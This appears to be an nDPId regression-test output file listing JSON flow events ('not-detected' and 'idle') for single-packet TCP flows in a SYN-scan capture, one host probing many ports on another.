+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 